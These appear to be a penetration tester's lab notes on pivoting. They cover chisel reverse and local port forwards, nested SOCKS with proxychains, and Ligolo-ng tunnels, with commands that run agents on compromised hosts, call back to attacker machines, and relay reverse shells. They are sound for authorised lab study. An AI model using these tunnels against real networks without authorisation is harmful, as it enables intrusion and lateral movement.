A shallow guide on Pivoting

These are my personal notes that I made during my OSCP prep and later while solving the Offshore labs by HackTheBox. They are deliberately written in layman's terms, so that I can understand what I need to do without deep jargon.

Chisel:
Situation: Reverse Pivot

When you want to reach (check, scan, connect to) a port on a host inside the target machine's internal network from your own box:

# Your machine attacker.local
chisel server -p 8000 -reverse
# On the compromised host client.target, which can reach internal.target:port
chisel client attacker.local:8000 R:8001:internal.target:port
# ^ this opens port 8001 on attacker.local; whatever you send there is carried over
# the tunnel and delivered by client.target to internal.target:port. In layman's
# terms, attacker.local:8001 is a copy of internal.target:port.
# R: remotes need the -reverse flag on the server. By default 8001 is bound on all
# interfaces of attacker.local; use R:127.0.0.1:8001:internal.target:port to keep it
# on loopback only.

Situation: Local Pivot

When we want the target machine to forward any traffic that arrives on a newly opened port of its own to a port on our machine. This can be used to tunnel a reverse shell from a host deeper inside the target network: internal host --> client.target:9001 --> chisel tunnel --> attacker.local:8001.

# Your machine attacker.local (have your handler listening on 8001 first, e.g. nc -lvnp 8001)
chisel server -p 8000
# Client client.target
chisel client attacker.local:8000 9001:127.0.0.1:8001
# 9001      new port opened on client.target, on all interfaces, so internal hosts can reach it
# 127.0.0.1 loopback of attacker.local: without R:, the remote host is resolved on the server side
# 8001      port on attacker.local that must already be listening (chisel does not open it)

Can also be used to access a specific service on either side of the network by swapping the host and port values in the annotated command above.
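The easiest mistake with both situations above is reading the host in the middle of the remote spec on the wrong side: without `R:` it is resolved by the chisel server, with `R:` by the chisel client. The helper below is an added example, not code from the original notes or from the chisel project; it decodes a chisel remote spec according to the grammar and defaults in the chisel README (confirm them against `chisel client --help` for your version) and prints which side listens and which side dials. `client.target` and `attacker.local` are the placeholder names used in these notes, and the `/udp` and `socks` forms go beyond the specs used above.

```sh
#!/bin/sh
# Added example (not from the original notes): decode a chisel <remote> spec and
# state which side opens the listener and which side dials out. Grammar and defaults
# follow the chisel README; confirm against `chisel client --help` for your version:
#   [R:][local-interface:]local-port:remote-host:remote-port[/protocol]
#   socks | local-port:socks | local-interface:local-port:socks
# Without "R:"  the CLIENT listens and the SERVER resolves/dials remote-host:remote-port.
# With "R:"     (server started with -reverse) the roles flip: the SERVER listens and
#               the CLIENT dials. client.target / attacker.local are placeholder names.
#
# Usage: chisel_remote_explain <remote-spec> [client-host] [server-host]
chisel_remote_explain() {
  spec=$1
  client=${2:-client.target}
  server=${3:-attacker.local}
  listener=$client   # side that opens the listening socket
  dialer=$server     # side that resolves remote-host and makes the outbound connection
  proto=tcp
  case $spec in
    R:*) spec=${spec#R:}; listener=$server; dialer=$client ;;
  esac
  case $spec in
    */*) proto=${spec##*/}; spec=${spec%/*} ;;
  esac
  case $spec in
    *socks)
      # SOCKS remotes have no remote-host:remote-port; the dialer is the proxy exit.
      rest=${spec%socks}; rest=${rest%:}      # "" | "5000" | "127.0.0.1:5000"
      case $rest in
        '')  laddr=127.0.0.1:1080 ;;           # chisel's default SOCKS listen address
        *:*) laddr=$rest ;;
        *)   laddr=127.0.0.1:$rest ;;
      esac
      echo "$listener listens on $laddr/$proto as a SOCKS5 proxy; connections exit from $dialer"
      return 0 ;;
  esac
  # Remaining colon-separated fields; chisel fills them in from the right, so a
  # missing local-port defaults to remote-port and a missing remote-host to 0.0.0.0.
  old_ifs=$IFS; IFS=:; set -- $spec; IFS=$old_ifs
  case $# in
    1) iface=0.0.0.0; lport=$1; rhost=0.0.0.0; rport=$1 ;;
    2) iface=0.0.0.0; lport=$2; rhost=$1;      rport=$2 ;;
    3) iface=0.0.0.0; lport=$1; rhost=$2;      rport=$3 ;;
    4) iface=$1;      lport=$2; rhost=$3;      rport=$4 ;;
    *) echo "bad remote spec: $spec" >&2; return 1 ;;
  esac
  for p in "$lport" "$rport"; do
    case $p in ''|*[!0-9]*) echo "bad remote spec: $spec" >&2; return 1 ;; esac
  done
  echo "$listener listens on $iface:$lport/$proto; $dialer connects to $rhost:$rport"
}

# The remotes used in these notes. The second one is the easy one to get wrong:
# without R:, 127.0.0.1 is the loopback of the SERVER (attacker.local), not of client.target.
chisel_remote_explain R:8001:internal.target:445
chisel_remote_explain 9001:127.0.0.1:8001
chisel_remote_explain R:8001:127.0.0.1:1337
# In the nested Reverse SOCKS setup the attacker is the chisel *client* and the nested
# server runs on the target, so pass the real roles explicitly:
chisel_remote_explain socks attacker.local client.target
```

Run it as `sh chisel_remote.sh`; the output for `9001:127.0.0.1:8001` shows that the attacker, not the target, is the host that resolves 127.0.0.1.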

Situation: Reverse SOCKS

This is when you want to scale everything we did above, so you don't have to create a new tunnel every time you want to test another port. For example, if you checked port 8080 with a simple tunnel from the methods above and now want to check port 80, you would have to go back and create a new tunnel. This method nests chisel in chisel: it runs a client and a server on both sides and exposes a SOCKS5 proxy on the attacker machine.
We then point proxychains at that SOCKS port and run whatever tool we want through it.

# On machine attacker.local
chisel server -p 8000 -reverse

# On client.target
chisel client attacker.local:8000 R:8001:127.0.0.1:1337
# 8001      new port opened on attacker.local
# 127.0.0.1 loopback of client.target (with R:, the remote host is resolved on the client side)
# 1337      port on client.target where the nested chisel server below will listen
chisel server -p 1337 --socks5
#                ^^^^ the same port used in the client command above

# On machine attacker.local
chisel client 127.0.0.1:8001 socks
# connects through the forwarded port 8001 to the nested chisel server on client.target and
# opens a SOCKS5 listener on attacker.local (127.0.0.1:1080 by default); point proxychains
# at it with "socks5 127.0.0.1 1080" in its config.
# Current chisel releases support reverse SOCKS directly, so the nesting can be skipped:
# "chisel client attacker.local:8000 R:socks" against the -reverse server gives the same
# SOCKS5 listener on attacker.local.
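The proxychains step is only mentioned above, so here is the attacker-side glue as an added example (not code from the original notes, chisel or proxychains). It assumes proxychains-ng (the `proxychains4` binary with its `-f <conf>` and `-q` options), a chisel `socks` listener on 127.0.0.1:1080 as set up above, and `ss -ltn` for the preflight; the listener check is kept as a pure function of the `ss` output so it can be exercised offline on constructed sample lines. Writing a per-engagement config instead of editing /etc/proxychains4.conf keeps the pivot settings next to the engagement notes.

```sh
#!/bin/sh
# Added example (not from the original notes): per-engagement proxychains setup for the
# chisel SOCKS listener above, plus a preflight that the listener actually exists.
# Assumptions: proxychains-ng (`proxychains4 -q -f <conf>`), SOCKS on 127.0.0.1:<port>,
# `ss -ltn` available on the attacker box.

# Write a minimal proxychains config. proxy_dns sends name resolution through the SOCKS
# proxy too, so internal hostnames resolve on the far side of the tunnel; strict_chain
# fails closed instead of silently falling back to a direct connection.
write_proxychains_conf() {  # <conf-path> <socks-port>
  cat > "$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $2
EOF
}

# Return 0 if <ss-listing> (the output of `ss -ltn`) shows a listener on <addr:port>.
# Column 1 is the socket state, column 4 is "Local Address:Port".
listening_in() {  # <ss-listing> <addr:port>
  printf '%s\n' "$1" | awk -v want="$2" '$1=="LISTEN" && $4==want {found=1} END {exit found?0:1}'
}

# Preflight, then run a tool through the pivot. Without the check, a missing SOCKS
# listener shows up only as every single connection of the tool erroring out or hanging.
via_socks() {  # <socks-port> <command...>
  port=$1; shift
  conf=${PROXYCHAINS_CONF:-/tmp/proxychains-$port.conf}
  listening_in "$(ss -ltn 2>/dev/null)" "127.0.0.1:$port" || {
    echo "no SOCKS listener on 127.0.0.1:$port (is 'chisel client ... socks' running?)" >&2
    return 1
  }
  write_proxychains_conf "$conf" "$port"
  proxychains4 -q -f "$conf" "$@"
}

# Example call (172.16.2.10 is a placeholder host in the internal subnet from the notes):
# via_socks 1080 nmap -sT -Pn -n -p 80,445,8080 172.16.2.10
```

A SOCKS proxy only carries TCP connections, so nmap through it must use a connect scan without host discovery (`-sT -Pn`); SYN scans, UDP and ICMP ping never reach the other side, which is one reason the Ligolo-ng approach below is more convenient.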

Ligolo-ng

This does the same job as the reverse SOCKS setup, but far more conveniently: instead of a SOCKS listener plus proxychains, the agent on the victim gives you a TUN interface on the attacker with a route to the internal subnet, so every tool (including ICMP ping, which SOCKS cannot carry) works unchanged.

# Prepping attacker machine for ligolo:
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.2.0/24 dev ligolo
#                  ^^^^^^^^^^^^ internal subnet you want to reach through the tunnel;
#                               add one route per subnet the agent can see

# On Attacker machine:
sudo ./proxy -selfcert
# Note the port from the output of the above command - default 11601

# On Victim machine:
# Upload agent.exe to target
./agent.exe -connect ATTACKER.IP:<PORT FROM PROXY COMMAND> -ignore-cert
# -ignore-cert is needed because -selfcert gave the proxy a self-signed certificate

# Back on attacker machine, a session will open up in the proxy's prompt: type session,
# select it, then type start. ifconfig in the same prompt lists the agent's interfaces,
# which tells you which subnets are worth routing in the prep step above.

All of these are heavily inspired by the video Ippsec made and released years ago on the HTB box called Reddish. You can find it here.